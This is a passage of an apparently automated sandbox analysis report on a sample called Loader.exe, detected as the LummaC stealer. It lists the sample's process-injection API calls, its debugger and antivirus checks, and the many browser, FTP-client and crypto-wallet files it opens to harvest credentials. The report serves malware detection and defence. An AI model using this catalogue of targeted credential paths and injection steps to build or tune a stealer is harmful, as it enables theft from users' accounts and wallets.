                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Loader.exe, 00000002.00000003.1519173635.00000000034AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Loader.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0008BA66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0008BA66
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000B41B4 mov edi, dword ptr fs:[00000030h]0_2_000B41B4
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000994EC GetProcessHeap,0_2_000994EC
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0008BA5A SetUnhandledExceptionFilter,0_2_0008BA5A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0008BA66 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0008BA66
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00093B9E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00093B9E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0008B6AA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0008B6AA

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000B41B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_000B41B4
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_0009D069
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_000988DC
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0009D104
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_0009D357
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_0009D3B6
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_0009D48B
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_0009D4D6
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0009D57D
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_00098DD7
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0009CE18
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_0009D683
                Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0008C4A7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0008C4A7
                Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Loader.exe, 00000002.00000003.1644846564.0000000000E14000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1625967642.0000000000DFD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1625798119.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 7788, type: MEMORYSTR
                Source: Yara matchFile source: 2.2.Loader.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Loader.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2665491875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1408953091.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: Loader.exeString found in binary or memory: Wallets/Electrum-LTC
                Source: Loader.exeString found in binary or memory: Wallets/ElectronCash
                Source: Loader.exeString found in binary or memory: Jaxx Liberty
                Source: Loader.exeString found in binary or memory: window-state.json
                Source: Loader.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: Loader.exeString found in binary or memory: ExodusWeb3
                Source: Loader.exeString found in binary or memory: %appdata%\Ethereum
                Source: Loader.exe, 00000002.00000003.1587677507.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Loader.exeString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
